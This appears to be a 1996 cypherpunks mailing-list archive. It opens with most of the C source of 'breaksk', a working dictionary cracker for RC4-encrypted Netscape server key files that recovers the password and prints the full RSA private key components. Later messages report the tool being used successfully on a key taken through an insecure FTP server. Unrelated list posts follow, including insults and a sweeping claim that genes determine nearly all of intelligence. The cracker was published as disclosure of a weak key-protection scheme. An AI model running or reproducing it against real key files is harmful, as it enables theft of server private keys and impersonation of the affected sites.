	FF( C, D, A, B, data[  2 ], S13,  606105819UL );	/*  3 */
	FF( B, C, D, A, data[  3 ], S14, 3250441966UL );	/*  4 */
	FF( A, B, C, D, data[  4 ], S11, 4118548399UL );	/*  5 */
	FF( D, A, B, C, data[  5 ], S12, 1200080426UL );	/*  6 */
	FF( C, D, A, B, data[  6 ], S13, 2821735955UL );	/*  7 */
	FF( B, C, D, A, data[  7 ], S14, 4249261313UL );	/*  8 */
	FF( A, B, C, D, data[  8 ], S11, 1770035416UL );	/*  9 */
	FF( D, A, B, C, data[  9 ], S12, 2336552879UL );	/* 10 */
	FF( C, D, A, B, data[ 10 ], S13, 4294925233UL );	/* 11 */
	FF( B, C, D, A, data[ 11 ], S14, 2304563134UL );	/* 12 */
	FF( A, B, C, D, data[ 12 ], S11, 1804603682UL );	/* 13 */
	FF( D, A, B, C, data[ 13 ], S12, 4254626195UL );	/* 14 */
	FF( C, D, A, B, data[ 14 ], S13, 2792965006UL );	/* 15 */
	FF( B, C, D, A, data[ 15 ], S14, 1236535329UL );	/* 16 */

	/* Round 2 */
	GG( A, B, C, D, data[  1 ], S21, 4129170786UL );	/* 17 */
	GG( D, A, B, C, data[  6 ], S22, 3225465664UL );	/* 18 */
	GG( C, D, A, B, data[ 11 ], S23,  643717713UL );	/* 19 */
	GG( B, C, D, A, data[  0 ], S24, 3921069994UL );	/* 20 */
	GG( A, B, C, D, data[  5 ], S21, 3593408605UL );	/* 21 */
	GG( D, A, B, C, data[ 10 ], S22,   38016083UL );	/* 22 */
	GG( C, D, A, B, data[ 15 ], S23, 3634488961UL );	/* 23 */
	GG( B, C, D, A, data[  4 ], S24, 3889429448UL );	/* 24 */
	GG( A, B, C, D, data[  9 ], S21,  568446438UL );	/* 25 */
	GG( D, A, B, C, data[ 14 ], S22, 3275163606UL );	/* 26 */
	GG( C, D, A, B, data[  3 ], S23, 4107603335UL );	/* 27 */
	GG( B, C, D, A, data[  8 ], S24, 1163531501UL );	/* 28 */
	GG( A, B, C, D, data[ 13 ], S21, 2850285829UL );	/* 29 */
	GG( D, A, B, C, data[  2 ], S22, 4243563512UL );	/* 30 */
	GG( C, D, A, B, data[  7 ], S23, 1735328473UL );	/* 31 */
	GG( B, C, D, A, data[ 12 ], S24, 2368359562UL );	/* 32 */

	/* Round 3 */
	HH( A, B, C, D, data[  5 ], S31, 4294588738UL );	/* 33 */
	HH( D, A, B, C, data[  8 ], S32, 2272392833UL );	/* 34 */
	HH( C, D, A, B, data[ 11 ], S33, 1839030562UL );	/* 35 */
	HH( B, C, D, A, data[ 14 ], S34, 4259657740UL );	/* 36 */
	HH( A, B, C, D, data[  1 ], S31, 2763975236UL );	/* 37 */
	HH( D, A, B, C, data[  4 ], S32, 1272893353UL );	/* 38 */
	HH( C, D, A, B, data[  7 ], S33, 4139469664UL );	/* 39 */
	HH( B, C, D, A, data[ 10 ], S34, 3200236656UL );	/* 40 */
	HH( A, B, C, D, data[ 13 ], S31,  681279174UL );	/* 41 */
	HH( D, A, B, C, data[  0 ], S32, 3936430074UL );	/* 42 */
	HH( C, D, A, B, data[  3 ], S33, 3572445317UL );	/* 43 */
	HH( B, C, D, A, data[  6 ], S34,   76029189UL );	/* 44 */
	HH( A, B, C, D, data[  9 ], S31, 3654602809UL );	/* 45 */
	HH( D, A, B, C, data[ 12 ], S32, 3873151461UL );	/* 46 */
	HH( C, D, A, B, data[ 15 ], S33,  530742520UL );	/* 47 */
	HH( B, C, D, A, data[  2 ], S34, 3299628645UL );	/* 48 */

	/* Round 4 */
	II( A, B, C, D, data[  0 ], S41, 4096336452UL );	/* 49 */
	II( D, A, B, C, data[  7 ], S42, 1126891415UL );	/* 50 */
	II( C, D, A, B, data[ 14 ], S43, 2878612391UL );	/* 51 */
	II( B, C, D, A, data[  5 ], S44, 4237533241UL );	/* 52 */
	II( A, B, C, D, data[ 12 ], S41, 1700485571UL );	/* 53 */
	II( D, A, B, C, data[  3 ], S42, 2399980690UL );	/* 54 */
	II( C, D, A, B, data[ 10 ], S43, 4293915773UL );	/* 55 */
	II( B, C, D, A, data[  1 ], S44, 2240044497UL );	/* 56 */
	II( A, B, C, D, data[  8 ], S41, 1873313359UL );	/* 57 */
	II( D, A, B, C, data[ 15 ], S42, 4264355552UL );	/* 58 */
	II( C, D, A, B, data[  6 ], S43, 2734768916UL );	/* 59 */
	II( B, C, D, A, data[ 13 ], S44, 1309151649UL );	/* 60 */
	II( A, B, C, D, data[  4 ], S41, 4149444226UL );	/* 61 */
	II( D, A, B, C, data[ 11 ], S42, 3174756917UL );	/* 62 */
	II( C, D, A, B, data[  2 ], S43,  718787259UL );	/* 63 */
	II( B, C, D, A, data[  9 ], S44, 3951481745UL );	/* 64 */

	/* Build message digest */
	digest[ 0 ] = MASK32( digest[ 0 ] + A );
	digest[ 1 ] = MASK32( digest[ 1 ] + B );
	digest[ 2 ] = MASK32( digest[ 2 ] + C );
	digest[ 3 ] = MASK32( digest[ 3 ] + D );
	}

/****************************************************************************
*																			*
*							MD5 Support Routines							*
*																			*
****************************************************************************/

/* The routine md5Initial initializes the message-digest context md5Info */

void md5Initial( MD5_INFO *md5Info )
	{
	/* Clear all fields */
	memset( md5Info, 0, sizeof( MD5_INFO ) );

	/* Load magic initialization constants */
	md5Info->digest[ 0 ] = 0x67452301L;
	md5Info->digest[ 1 ] = 0xEFCDAB89L;
	md5Info->digest[ 2 ] = 0x98BADCFEL;
	md5Info->digest[ 3 ] = 0x10325476L;

	/* Initialise bit count */
	md5Info->countLo = md5Info->countHi = 0L;
	}

/* The routine MD5Update updates the message-digest context to account for
   the presence of each of the characters buffer[ 0 .. count-1 ] in the
   message whose digest is being computed */

void md5Update( MD5_INFO *md5Info, BYTE *buffer, int count )
	{
	LONG tmp;
	int dataCount;

	/* Update bitcount */
	tmp = md5Info->countLo;
	if ( ( md5Info->countLo = tmp + ( ( LONG ) count << 3 ) ) < tmp )
		md5Info->countHi++;				/* Carry from low to high */
	md5Info->countHi += count >> 29;

	/* Get count of bytes already in data */
	dataCount = ( int ) ( tmp >> 3 ) & 0x3F;

	/* Handle any leading odd-sized chunks */
	if( dataCount )
		{
#ifdef _BIG_WORDS
		BYTE *p = md5Info->dataBuffer + dataCount;
#else
		BYTE *p = ( BYTE * ) md5Info->data + dataCount;
#endif /* _BIG_WORDS */

		dataCount = MD5_DATASIZE - dataCount;
		if( count < dataCount )
			{
			memcpy( p, buffer, count );
			return;
			}
		memcpy( p, buffer, dataCount );
#ifdef _BIG_WORDS
		copyToLLong( md5Info->data, md5Info->dataBuffer, MD5_DATASIZE );
#else
		littleToBigLong( md5Info->data, MD5_DATASIZE );
#endif /* _BIG_WORDS */
		MD5Transform( md5Info->digest, md5Info->data );
		buffer += dataCount;
		count -= dataCount;
		}

	/* Process data in MD5_DATASIZE chunks */
	while( count >= MD5_DATASIZE )
		{
#ifdef _BIG_WORDS
		memcpy( md5Info->dataBuffer, buffer, MD5_DATASIZE );
		copyToLLong( md5Info->data, md5Info->dataBuffer, MD5_DATASIZE );
#else
		memcpy( md5Info->data, buffer, MD5_DATASIZE );
		littleToBigLong( md5Info->data, MD5_DATASIZE );
#endif /* _BIG_WORDS */
		MD5Transform( md5Info->digest, md5Info->data );
		buffer += MD5_DATASIZE;
		count -= MD5_DATASIZE;
		}

	/* Handle any remaining bytes of data. */
#ifdef _BIG_WORDS
	memcpy( md5Info->dataBuffer, buffer, count );
#else
	memcpy( md5Info->data, buffer, count );
#endif /* _BIG_WORDS */
	}

/* Final wrapup - pad to MD5_DATASIZE-byte boundary with the bit pattern
   1 0* (64-bit count of bits processed, MSB-first) */

void md5Final( MD5_INFO *md5Info )
	{
	int count;
	BYTE *dataPtr;

	/* Compute number of bytes mod 64 */
	count = ( int ) md5Info->countLo;
	count = ( count >> 3 ) & 0x3F;

	/* Set the first char of padding to 0x80.  This is safe since there is
	   always at least one byte free */
#ifdef _BIG_WORDS
	dataPtr = md5Info->dataBuffer + count;
#else
	dataPtr = ( BYTE * ) md5Info->data + count;
#endif /* _BIG_WORDS */
	*dataPtr++ = 0x80;

	/* Bytes of padding needed to make 64 bytes */
	count = MD5_DATASIZE - 1 - count;

	/* Pad out to 56 mod 64 */
	if( count < 8 )
		{
		/* Two lots of padding:  Pad the first block to 64 bytes */
		memset( dataPtr, 0, count );
#ifdef _BIG_WORDS
		copyToLLong( md5Info->data, md5Info->dataBuffer, MD5_DATASIZE );
#else
		littleToBigLong( md5Info->data, MD5_DATASIZE );
#endif /* _BIG_WORDS */
		MD5Transform( md5Info->digest, md5Info->data );

		/* Now fill the next block with 56 bytes */
#ifdef _BIG_WORDS
		memset( md5Info->dataBuffer, 0, MD5_DATASIZE - 8 );
#else
		memset( md5Info->data, 0, MD5_DATASIZE - 8 );
#endif /* _BIG_WORDS */
		}
	else
		/* Pad block to 56 bytes */
		memset( dataPtr, 0, count - 8 );
#ifdef _BIG_WORDS
	copyToLLong( md5Info->data, md5Info->dataBuffer, MD5_DATASIZE );
#endif /* _BIG_WORDS */

	/* Append length in bits and transform */
	md5Info->data[ 14 ] = md5Info->countLo;
	md5Info->data[ 15 ] = md5Info->countHi;

#ifndef _BIG_WORDS
	littleToBigLong( md5Info->data, MD5_DATASIZE - 8 );
#endif /* _BIG_WORDS */
	MD5Transform( md5Info->digest, md5Info->data );

	md5Info->done = TRUE;
	}

/****************************************************************************
*																			*
*										RC4 								*
*																			*
****************************************************************************/

/* If the system can handle byte ops, we use those so we don't have to do a
   lot of masking.  Otherwise, we use machine-word-size ops which will be
   faster on RISC machines */

#if UINT_MAX > 0xFFFFL		/* System has 32-bit ints */
  #define USE_LONG_RC4

  typedef unsigned int rc4word;
#else
  typedef unsigned char rc4word;
#endif /* UINT_MAX > 0xFFFFL */

/* The scheduled RC4 key */

typedef struct {
	rc4word state[ 256 ];
	rc4word x, y;
	} RC4KEY ;

/* Expand an RC4 key */

void rc4ExpandKey( RC4KEY *rc4, unsigned char const *key, int keylen )
	{
	int x, keypos = 0;
	rc4word sx, y = 0;
	rc4word *state = &rc4->state[ 0 ];

	rc4->x = rc4->y = 0;

	for( x = 0; x < 256; x++ )
		state[ x ] = x;

	for( x = 0; x < 256; x++ )
		{
		sx = state[ x ];
		y += sx + key[ keypos ];
#ifdef USE_LONG_RC4
		y &= 0xFF;
#endif /* USE_LONG_RC4 */
		state[ x ] = state[ y ];
		state[ y ] = sx;

		if( ++keypos == keylen )
			keypos = 0;
		}
	}

void rc4Crypt( RC4KEY *rc4, unsigned char *data, int len )
{
	rc4word x = rc4->x, y = rc4->y;
	rc4word sx, sy;
	rc4word *state = &rc4->state[ 0 ];

	while (len--) {
		x++;
#ifdef USE_LONG_RC4
		x &= 0xFF;
#endif /* USE_LONG_RC4 */
		sx = state[ x ];
		y += sx;
#ifdef USE_LONG_RC4
		y &= 0xFF;
#endif /* USE_LONG_RC4 */
		sy = state[ y ];
		state[ y ] = sx;
		state[ x ] = sy;

#ifdef USE_LONG_RC4
		*data++ ^= state[ ( unsigned char ) ( sx+sy ) ];
#else
		*data++ ^= state[ ( sx+sy ) & 0xFF ];
#endif /* USE_LONG_RC4 */
	}

	rc4->x = x;
	rc4->y = y;
}

/****************************************************************************
*																			*
*									Driver Code 							*
*																			*
****************************************************************************/

/* Various magic values in the key file */

static BYTE netscapeKeyfileID[] = {
	0x04, 0x0B, 0x70, 0x72, 0x69, 0x76, 0x61, 0x74,
	0x65, 0x2D, 0x6B, 0x65, 0x79
	};
static BYTE rc4EncryptionID[] = {
	0x30, 0x0C, 0x06, 0x08, 0x2A, 0x86, 0x48, 0x86,
	0xF7, 0x0D, 0x03, 0x04, 0x05, 0x00
	};
static BYTE version[] = {
	0x02, 0x01, 0x00
	};
static BYTE rsaPrivateKeyID[] = {
	0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86,
	0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00
	};

/* General-purpose buffer.  We make them static buffers to keep them off the
   stack on DOS/Win16 boxes */

static BYTE buffer[ 1024 ], temp[ 1024 ];

/* Print a key component */

int printKeyComponent( BYTE *buffer, char *title )
	{
	int count, length = 0, totalLength = 2;

	printf( "%s = ", title );
	if( *buffer++ != 0x02 )
		{
		puts( "Bad data format in key component." );
		return( 0 );
		}

	/* Get the length of the component */
	if( *buffer & 0x80 )
		{
		count = *buffer++ & 0x7F;
		totalLength += count;
		while( count-- )
			length = ( length << 8 ) | *buffer++;
		}
	else
		length = *buffer++;
	totalLength += length;

	/* Print the data */
	for( count = 0; count < length; count++ )
		printf( "%02X", buffer[ count ] );
	putchar( '\n' );

	return( totalLength );
	}

/* The main program */

int main( int argc, char *argv[] )
	{
	FILE *keyFile, *dictFile;
	int count, length = 0;

	/* Check args and open the server key file */
	if( argc != 3 )
		{
		puts( "Usage: breaksk <server key file> <dictionary>" );
		return( EXIT_FAILURE );
		}
	if( ( keyFile = fopen( argv[ 1 ], "rb" ) ) == NULL )
		{
		perror( argv[ 1 ] );
		return( EXIT_FAILURE );
		}

	/* Read the Netscape outer wrapper */
	if( getc( keyFile ) != 0x30 )
		{
		puts( "This doesn't look like a Netscape server key file." );
		exit( EXIT_FAILURE );
		}
	count = getc( keyFile ) & 0x7F;
	while( count-- )
		getc( keyFile );
	if( ( fread( buffer, 1, 13, keyFile ) != 13 ) || \
		memcmp( buffer, netscapeKeyfileID, 13 ) )
		{
		puts( "This doesn't look like a Netscape server key file." );
		exit( EXIT_FAILURE );
		}

	/* Read the PKCS #8 EncryptedPrivateKey wrapper */
	if( getc( keyFile ) != 0x30 )
		{
		puts( "This doesn't look like a Netscape server key file." );
		exit( EXIT_FAILURE );
		}
	count = getc( keyFile ) & 0x7F;
	while( count-- )
		getc( keyFile );
	if( ( fread( buffer, 1, 14, keyFile ) != 14 ) || \
		memcmp( buffer, rc4EncryptionID, 14 ) )
		{
		puts( "This doesn't look like an RC4-encrypted server key." );
		exit( EXIT_FAILURE );
		}

	/* Read the start of the EncryptedData field */
	if( getc( keyFile ) != 0x04 )
		{
		puts( "This doesn't look like a Netscape server key file." );
		exit( EXIT_FAILURE );
		}
	count = getc( keyFile ) & 0x7F;
	while( count-- )
		length = ( length << 8 ) | getc( keyFile );

	/* Read the encrypted RSAPrivateKey */
	if( fread( buffer, 1, length, keyFile ) != length )
		{
		puts( "Netscape server key file length fields are inconsistent." );
		exit( EXIT_FAILURE );
		}
	fclose( keyFile );

	/* We've got the data we want, now rumble through the dictionary trying
	   each key on it.  First, make sure we can open the thing */
	if( ( dictFile = fopen( argv[ 2 ], "r" ) ) == NULL )
		{
		perror( argv[ 2 ] );
		return( EXIT_FAILURE );
		}

	while( TRUE )
		{
		BYTE hashedPassword[ MD5_DIGESTSIZE ], *hashedPassPtr = hashedPassword;
		MD5_INFO md5Info;
		RC4KEY rc4key;
		char dictWord[ 100 ];
		int dictWordLength, index;

		/* Get the next word from the dictionary */
		if( fgets( dictWord, 100, dictFile ) == NULL )
			{
			puts( "No more words in dictionary." );
			break;
			}
		dictWordLength = strlen( dictWord ) - 1;
		dictWord[ dictWordLength ] = '\0';

		/* Hash the word using MD5 */
		md5Initial( &md5Info );
		md5Update( &md5Info, ( BYTE * ) dictWord, dictWordLength );
		md5Final( &md5Info );
		for( index = 0; index < MD5_DIGESTSIZE / 4; index++ )
			{
			mputLLong( hashedPassPtr, md5Info.digest[ index ] );
			}

		/* Set up the RC4 key based on the hashed password */
		rc4ExpandKey( &rc4key, hashedPassword, MD5_DIGESTSIZE );

		/* Copy the data to a temporary buffer and try to decrypt it */
		memcpy( temp, buffer, length );
		rc4Crypt( &rc4key, temp, 22 );

		/* Check for known plaintext */
		if( temp[ 0 ] != 0x30 || !( temp[ 1 ] & 0x80 ) )
			continue;
		index = 1;
		count = temp[ index++ ] & 0x7F;
		while( count-- )
			index++;
		if( memcmp( temp + index, version, 3 ) )
			continue;
		index += 3;
		if( memcmp( temp + index, rsaPrivateKeyID, 15 ) )
			continue;

		/* We've found the password, display it and decrypt the rest of
		   the key */
		printf( "The password used to encrypt this Netscape server key "
				"is '%s'.\n\n", dictWord );
		index += 15;
		rc4Crypt( &rc4key, temp + 22, length - 22 );

		/* Skip the OCTET STRING encapsulation */
		if( temp[ index++ ] != 0x04 )
			{
			/* Should never happen */
			puts( "Bad data format in key file" );
			break;
			}
		count = temp[ index++ ] & 0x7F;
		while( count-- )
			index++;

		/* Skip the inner SEQUENCE encapsulation */
		if( temp[ index++ ] != 0x30 )
			{
			/* Should never happen */
			puts( "Bad data format in key file" );
			break;
			}
		count = temp[ index++ ] & 0x7F;
		while( count-- )
			index++;

		/* Skip the version number.  NB: This encoding is incorrect and
		   violates the ASN.1 encoding rules.  It's strange that the outer
		   version number is encoded correctly, but the inner one isn't */
		if( temp[ index++ ] != 0x02 || temp[ index++ ] != 0x00 )
			{
			/* Should never happen */
			puts( "Bad data format in key file" );
			break;
			}

		/* OK, now we've reached the key components.  Print each one out */
		index += printKeyComponent( temp + index, "Modulus" );
		index += printKeyComponent( temp + index, "Public exponent" );
		index += printKeyComponent( temp + index, "Private exponent" );
		index += printKeyComponent( temp + index, "Prime 1" );
		index += printKeyComponent( temp + index, "Prime 2" );
		index += printKeyComponent( temp + index, "Exponent 1" );
		index += printKeyComponent( temp + index, "Exponent 2" );
		index += printKeyComponent( temp + index, "Coefficient" );

		break;
		}
	fclose( dictFile );

	return( EXIT_SUCCESS );
	}







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Squirrel Remailer <mix@squirrel.owl.de>
Date: Thu, 26 Sep 1996 17:07:05 +0800
To: cypherpunks@toad.com
Subject: A periodic alert regarding Tim C. Mayo
Message-ID: <19960926053220.10997.qmail@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain


Here, Tim C. Mayo descends into total inanity. He should 
have a cold shower and/or a Turkish coffee.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 27 Sep 1996 13:03:01 +0800
To: Phil Fraering <cypherpunks@toad.com
Subject: Re: Cuba, Iraq, AP...
Message-ID: <199609270229.TAA03275@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:08 AM 9/26/96 -0500, Phil Fraering wrote:
> Shortly after the Gulf War elements in the Iraqi military tried to
> overthrow Hussein; they apparently tried to co-ordinate with the U.S., who
> tried to co-ordinate with Saudi Arabia, who warned Saddam that there was
> going to be a coup attempt; gotta stop that Ol' power vaccuum...
>
> The fact that the people who performed the Bay of Pigs were enticed into
> it by promised but withdrawn U.S. military support is a matter of public
> record; would Castro still be in power had the United States not 
> (intentionally? I don't know) destroyed the core resistance against him
> in that fashion?


Two rulers, one of whom is a communist, have more in common than two
communists, one of whom is a ruler.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 27 Sep 1996 13:38:37 +0800
To: Dale Thorn <dlv@bwalk.dm.com>
Subject: Re: Public Schools
Message-ID: <199609270229.TAA03286@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering <pgf@acadian.net> writes:
>> > Without vouchers, you don't say anything about the intelligence of
>> > your test subjects; to a _very_ large degree, intelligence isn't 
>> > genetic. Or

Bag of shit wrote:
>> That's the political correct thing to say, but do you have any
>> scientific evidence to support this claim?

At 11:19 PM 9/25/96 -0700, Dale Thorn wrote:
> People have argued for genetic disposition to certain things, and I 
> think they are sometimes (most times?) confused [...]
[Lots of meaningless hand waving hot air deleted]

The key basic test of the power of genes is studies of identical
twins raised in different families.

They have near identical IQ's, and a wide range of
very similar behavior.

Identical twins raised in different families are more 
similar than identical twins raised in the same family,
probably because of deliberate attempts to differentiate
themselves.

Except in the case of extreme environmental pressures -- 
starvation, neglect, and the like, genes count for
just about everything, and environment for almost 
nothing.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 27 Sep 1996 02:04:19 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: 45K fine for possession
In-Reply-To: <v03007804ae6f4b9596c9@[206.119.69.46]>
Message-ID: <Pine.SUN.3.91.960926070859.29033A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 25 Sep 1996, Robert Hettinga wrote:

> 
> --- begin forwarded text
> ...
> Lai Chee Chuen, 41, pleaded guilty Monday to charges of collecting of
> pornographic pictures from the Internet and of possessing Penthouse, a
> magazine banned in Singapore, the Straits Times newspaper reported today.

When I was acting for th--then government owned--Singapore
Broadcasting Corporation, another actor showed me a smuggled in
copy of the Asian edition of Penthouse.  It cost him S$30, about 
US$20.  As tame as it was, it was hot stuff as far as he was 
concerned.  Apparently, the law is only enforced selectively to 
make a point.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 26 Sep 1996 23:00:14 +0800
To: jya@pipeline.com (John Young)
Subject: Re: Mitsubishi MISTY LSI
In-Reply-To: <199609252037.UAA11310@pipe2.ny3.usa.pipeline.com>
Message-ID: <199609261246.HAA03620@homeport.org>
MIME-Version: 1.0
Content-Type: text


John Young wrote:
|    Mitsubishi Electric Corp. said it has developed an LSI 
|    that can encrypt data at a speed of 450 megabits per 
|    second, which is four times faster than any other 
|    encryption chip developed in Japan and brings domestic 
|    technology in line with DES, the U.S.-developed 
|    encryption system that has become the standard in the 
|    U.S. and Europe. 

	Its worth noting that even if the chip is as fast as they
claim (quite possible), and if its highly key agile (less probable,
but not unlikely), it may not be feasable to build devices that work
at anything near that speed, due to bus issues, i/o barriers, etc.

	Also, in response to Bill Frantz's snake oil questions, we
need to wait a few years before using it.  Unfortunately, in the real
world, there are people installing point to point ATM links, who need
this speed today, and might choose to install as evesdropping
protection.  Weak crypto, acknowledged and understood as such, can be
better than plaintext.

	Strong crypto is obviously better, and I'll happily take
pointers to vendors of 100mb ethernet, fddi or >=155mb atm crypto
hardware thats available today.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 26 Sep 1996 23:19:44 +0800
To: cypherpunks@toad.com
Subject: Re: More proposals for European censorship
In-Reply-To: <324A17BE.4C09@gte.net>
Message-ID: <1P3uuD38w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
>                                                       I can't possibly
> be doing anything illegal by logging on to this service and receiving
> and posting email to cypherpunks

"Practicing cryptography without a licence?"

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Fri, 27 Sep 1996 01:47:19 +0800
To: cypherpunks@toad.com
Subject: Re: Cuba, Iraq, AP...
In-Reply-To: <199609260356.WAA00453@smoke.suba.com>
Message-ID: <Pine.SOL.3.93.960926090237.25731A-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996, snow wrote:

>      Some would say that 1) Saddam (as a problem) was _created_ by the US, 
> and it would not be in the interest of certain people to have him die.
> Along the same lines, Castro, while not exactly friendly (and who can blame 
> him) to the US, is also not a threat, and never really has been. Killing 
> him would serve no purpose.

Shortly after the Gulf War elements in the Iraqi military tried to
overthrow Hussein; they apparently tried to co-ordinate with the U.S., who
tried to co-ordinate with Saudi Arabia, who warned Saddam that there was
going to be a coup attempt; gotta stop that Ol' power vaccuum...

The fact that the people who performed the Bay of Pigs were enticed into
it by promised but withdrawn U.S. military support is a matter of public
record; would Castro still be in power had the United States not 
(intentionally? I don't know) destroyed the core resistance against him
in that fashion?


Phil Fraering          The above is the opinion of neither my internet
pgf@acadian.net        service provider nor my employer.
318/261-9649               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 27 Sep 1996 01:22:37 +0800
To: cypherpunks@toad.com
Subject: Re: FPGAs (was: Edited Edupage, 19 Sept 1996)
Message-ID: <199609261338.GAA14701@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> From:	IN%"educom@educom.unc.edu" 20-SEP-1996 01:52:41.56
> 
> >*****************************************************************
> >Edupage, 19 September 1996.  Edupage, a summary of news about information
> >technology, is provided three times a week as a service by Educom,
> >a Washington, D.C.-based consortium of leading colleges and universities
> >seeking to transform education through the use of information technology.
> >*****************************************************************

> >PROGRAMMABLE COMPUTER CHIPS
> >Next month, Metalithic Systems Inc. will release a $1500 sound board called
> >Digital Wings that uses field-programmable gate array computer chips that
> >can be personalized, allowing the user to create and edit up to 128
> >soundtracks.  When used in combination with Windows 95, Digital Wings will
> >give users access to audio synthesis and editing tools comparable to those
> >of a professional sound studio.  (Business Week 23 Sep 96 p86)
> 
> 	I wonder exactly how reprogrammable this system is...

Who cares? If you want to program an FPGA, there are plenty of
cheaper systems available: for example, see
http://204.58.152.114/products/isa.html

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Fri, 27 Sep 1996 01:35:58 +0800
To: pgut001@cs.auckland.ac.nz
Subject: RE: How to break Netscape's server key encryption - Followup
Message-ID: <n1368390846.43521@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


Could someone please repost the code referred to in this posting?
I seem to have missed it, and I'm curious to see how it works.

Thanks!

Patrick

_______________________________________________________________________________
From: pgut001@cs.auckland.ac.nz on Thu, Sep 26, 1996 9:47
Subject: How to break Netscape's server key encryption - Followup
To: cypherpunks@toad.com

There has been a successful hostile attack on a Netscape server key using the
code I posted yesterday.  I was contacted earlier today by someone who told me
he had in the past obtained Netscape server keys and PGP private keys from
Windows NT machines running Microsofts insecure FTP server which allows access
to the entire drive (he found some of the PGP keys using archie searches -
ouch!).  He lives somewhere with nasty anti-hacking laws and definitely
doesn't
want his identity known, but after some pleading said I could reveal the
following:
 
  - He used the cracklib dictionary to get the password
  - The password was found "very quickly"
  - The password was a female name
  - He deleted the server key after he'd found the password
  - He did it merely out of idle curiosity and has no intention of misusing
the
    information.
  - He definitely doesn't want to be contacted
 
Peter.


------------------ RFC822 Header Follows ------------------
Received: by mail.ndhm.gtegsc.com with SMTP;26 Sep 1996 09:47:35 -0400
Received: from toad.com by delphi.ndhm.gtegsc.com with SMTP;
          Thu, 26 Sep 1996 13:44:58 GMT
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id CAA12813 for
cypherpunks-outgoing; Thu, 26 Sep 1996 02:53:13 -0700 (PDT)
Received: from cs20.cs.auckland.ac.nz (root@cs20.cs.auckland.ac.nz
[130.216.34.10]) by toad.com (8.7.5/8.7.3) with ESMTP id CAA12807 for
<cypherpunks@toad.com>; Thu, 26 Sep 1996 02:53:09 -0700 (PDT)
From: pgut001@cs.auckland.ac.nz
Received: from cs26.cs.auckland.ac.nz by cs20.cs.auckland.ac.nz (8.7/4.7)
	id VAA14298; Thu, 26 Sep 1996 21:54:11 +1200 (NZST)
Received: by cs26.cs.auckland.ac.nz (relaymail v0.9)
	id <84373168812186>; Thu, 26 Sep 1996 21:54:48 (NZST)
To: cypherpunks@toad.com
Subject: How to break Netscape's server key encryption - Followup
Reply-To: pgut001@cs.auckland.ac.nz
X-Charge-To: pgut001
X-Authenticated: relaymail v0.9 on cs26.cs.auckland.ac.nz
Date: Thu, 26 Sep 1996 21:54:48 (NZST)
Message-ID: <84373168812186@cs26.cs.auckland.ac.nz>
Sender: owner-cypherpunks@toad.com
Precedence: bulk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rolf Weber <weber@iez.com>
Date: Thu, 26 Sep 1996 18:05:17 +0800
To: asgaard@Cor.sos.sll.se (Asgaard)
Subject: Re: We removed radikal 154 from xs4all :(
In-Reply-To: <Pine.HPP.3.91.960925180702.2695A-100000@cor.sos.sll.se>
Message-ID: <9609260751.AA12336@spibm02>
MIME-Version: 1.0
Content-Type: text/plain


> 
> (One German on the list has opinioned that they are 'childish'
> but that doesn't say much.)
> 
how could you define childish?
i did read 'radical'.
my impression was that's childish, but don't ask from me to
start a discussion about it.
perhaps they translate it to english, so you can see by yourself.
that's the idea of free speech.

rolf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rolf Weber <weber@iez.com>
Date: Thu, 26 Sep 1996 18:00:05 +0800
To: aba@dcs.ex.ac.uk (Adam Back)
Subject: Re: We removed radikal 154 from xs4all :(
In-Reply-To: <199609251555.QAA00118@server.test.net>
